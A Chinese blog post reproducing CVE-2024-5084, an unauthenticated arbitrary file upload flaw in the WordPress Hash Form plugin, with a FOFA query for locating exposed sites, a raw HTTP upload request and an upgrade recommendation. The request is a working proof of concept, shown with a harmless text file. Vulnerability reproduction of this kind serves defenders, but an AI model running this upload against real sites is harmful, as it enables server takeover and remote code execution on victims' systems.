CVE-2024-5084漏洞复现

admin 2024年7月11日11:49:03评论27 views字数 1047阅读3分29秒阅读模式

使

01

漏洞名称

WordPress的Hash表单任意文件上传漏洞

02

漏洞影响

<= 1.1.0 版本

03

漏洞描述

WordPress的Hash表单 - 拖放表单构建器插件由于在所有版本中缺失'file_upload_action'函数中的文件类型验证,存在任意文件上传漏洞,包括1.1.0版本。这使得未经身份验证的攻击者可以在受影响站点的服务器上上传任意文件,可能导致远程代码执行。

04

FOFA搜索语句
"/wp-content/plugins/hash-form/"

CVE-2024-5084漏洞复现

05

漏洞复现

第一步,请求目标网站,从body中获取ajax_nounce的值

CVE-2024-5084漏洞复现

第二步,上传文件,路径中file_uploader_nonce用第一步获取到的值,qqfile为上传文件名5a499f6e26313e19bd4049009bbed5bd为上传文件内容

POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce=5ec33b3537&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile=YwlKW.txt HTTP/1.1 Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0Connection: closeContent-Length: 32Content-Type: application/x-www-form-urlencodedCookie: request_a_quote_user_coockie=668e50f1d574c; PHPSESSID=6ltqhpjj2f7ciavd9s8dvh1i0eAccept-Encoding: gzip5a499f6e26313e19bd4049009bbed5bd

第三步,查看回显文件

http://x.x.x.x/wp-content/uploads/hashform/temp/YwlKW.txt

CVE-2024-5084漏洞复现

漏洞复现成功

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-5084漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月11日11:49:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-5084漏洞复现https://cn-sec.com/archives/2941421.html

发表评论

匿名网友 填写信息